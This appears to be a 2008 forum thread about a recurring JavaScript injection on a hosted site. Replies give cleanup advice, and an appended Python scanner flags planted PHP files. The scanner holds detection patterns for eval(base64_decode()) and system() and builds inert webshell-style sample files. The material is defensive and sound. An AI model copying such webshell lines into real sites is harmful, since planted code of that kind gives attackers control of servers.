got a virus named Iframe.ph on my server
Posted: Sun Jul 06, 2008 12:20 am
by jawedshamshedi
Hi all,
I have a website running. It was fine a few days back, but now when I open the site it opens a blank page. Then I checked the code of the index page and found that there is a JavaScript embedded in my code in all index pages and login pages; this JavaScript did open a blank page.
I downloaded the whole site, deleted the code from the server, and scanned the code with Kaspersky antivirus and Norton antivirus; both did not show any virus in the code. Then I manually checked all index and login named pages and no malicious code was there. Then I uploaded the site again, but for my bad luck the virus came again in Iframe.ph and again the site is not opening due to the same JavaScript code?
Can anyone help me in this regard?
Re: got a virus named Iframe.ph on my server
Posted: Sun Jul 06, 2008 3:24 am
by jaoudestudios
What text editor are you using?
As I know Dreamweaver enters lots of unwanted javascript.
Can you paste some of the code here so we can see it?
Re: got a virus named Iframe.ph on my server
Posted: Sun Jul 06, 2008 5:52 am
by Apollo
Most likely someone gained access to your web directory and infected some scripts.
Where is your website hosted?
Re: got a virus named Iframe.ph on my server
Posted: Mon Jul 07, 2008 12:10 am
by jawedshamshedi
Hi
Thanks for the response. I am using Dreamweaver CS3 and my site is hosted on Netsol. The problem is all the files named as index and login are affected; all the code in these files gets lost and this JavaScript is embedded
I tried many things but none worked out; I even removed the write permission of the index and login files, but this too did not work.
Thanks in advance for any kind of help
Re: got a virus named Iframe.ph on my server
Posted: Mon Jul 07, 2008 7:04 am
by Mordred
Scan your developer machine. There are malwares that do what you describe from your own machine.
For a workaround, zip your site and upload it from a cleanly installed OS.
Re: got a virus named Iframe.ph on my server
Posted: Mon Jul 07, 2008 3:29 pm
by orbitz
You also might have some apps that have vulnerabilities. Make sure to update those apps.
Re: got a virus named Iframe.ph on my server
Posted: Tue Jul 08, 2008 6:25 am
by jawedshamshedi
Thanks for the post. I already did all these: downloaded the whole site, scanned it with Norton and Kaspersky antivirus, and manually checked the pages' coding, but nothing wrong was in that code, and again the virus came. One more thing I wanted to add is that I am using some open source code like list, forums and event calendar, so can this be a reason? I mean, is the open source code putting in some scripts like this?
Re: got a virus named Iframe.ph on my server
Posted: Wed Jul 09, 2008 3:06 am
by Maugrim_The_Reaper
Could be a bot driven attack from an external source - are you using any PHP application which would be considered old or insecure? One popular example is PHPNuke or older versions of phpBB. These are so common they attract automated attacks.
The other option is to contact your hosting provider in case it's not just a simpler code injection attack. Maybe a Google search of the JavaScript could turn up similar cases elsewhere also?
Re: got a virus named Iframe.ph on my server
Posted: Fri Jul 18, 2008 12:01 pm
by Reviresco
I have had similar problems with one of my Network Solutions sites, but not the exact same scripts you've been getting. As far as I can tell, they hacked the server and put malicious files in my directories. I think the security holes have been fixed, but the scripts continued to wreak havoc until I found them.
First be sure to change your FTP login name and password. Then look through all your files and folders for anything you didn't make yourself. They're often placed in "images" folders, sometimes in a new folder called "thumbnails".
The files are often called things like "left_menu.php" or "right_menu.php". You'll see that there will be some encrypted code, which is run using eval(base64_decode()). You also will probably find a script that calls the php function system().
At least -- this is what was causing the problems for me.
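The manual search described in the last post can be scripted against a downloaded copy of the site. The following is an added example, not code from any poster in this thread: it flags PHP files that use eval(base64_decode()) or system(), PHP files sitting under "images" or "thumbnails", and pages that pair document.write() with a decoding primitive. The function names, indicator labels and sample files are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators named in the thread; the labels on the left are this example's own.
PHP_RULES = {
    "eval-base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
    "system-call": re.compile(rb"(?<![\w>$])system\s*\(", re.I),
}
DOC_WRITE = re.compile(rb"document\.write\s*\(", re.I)
DECODERS = re.compile(rb"String\.fromCharCode|['\"][0-9A-Fa-f]{16,}['\"]")
UPLOAD_DIRS = {"images", "thumbnails"}

def scan_file(path, rel):
    """Return sorted indicator names for one file; rel is its site-relative path."""
    data = Path(path).read_bytes()
    rel, hits = rel.lower(), set()
    if rel.endswith(".php"):
        hits.update(name for name, rx in PHP_RULES.items() if rx.search(data))
        if UPLOAD_DIRS & set(rel.split("/")[:-1]):
            hits.add("php-in-upload-dir")
    # document.write() alone is common; flag it only next to a decoding primitive.
    if DOC_WRITE.search(data) and DECODERS.search(data):
        hits.add("obfuscated-script")
    return sorted(hits)

def scan_tree(root):
    """Walk a downloaded copy of the site; map relative path -> indicators."""
    report = {}
    for path in Path(root).rglob("*"):
        rel = path.relative_to(root).as_posix()
        if path.is_file() and (hits := scan_file(path, rel)):
            report[rel] = hits
    return report

SAMPLE = {  # constructed files for a self-check, not taken from the thread
    "index.php": b"<?php echo 'hello'; ?>",
    "login.php": b"<script>document.write(String.fromCharCode(60,98,62))</script>",
    "images/left_menu.php": b"<?php eval(base64_decode('ZWNobyAxOw==')); ?>",
    "thumbnails/right_menu.php": b"<?php system('id'); ?>",
}

def scan_sample():
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_tree(root)
```

A hit is a prompt to open the file and compare it with a known-good copy; legitimate applications also call system(), so each match needs a manual look.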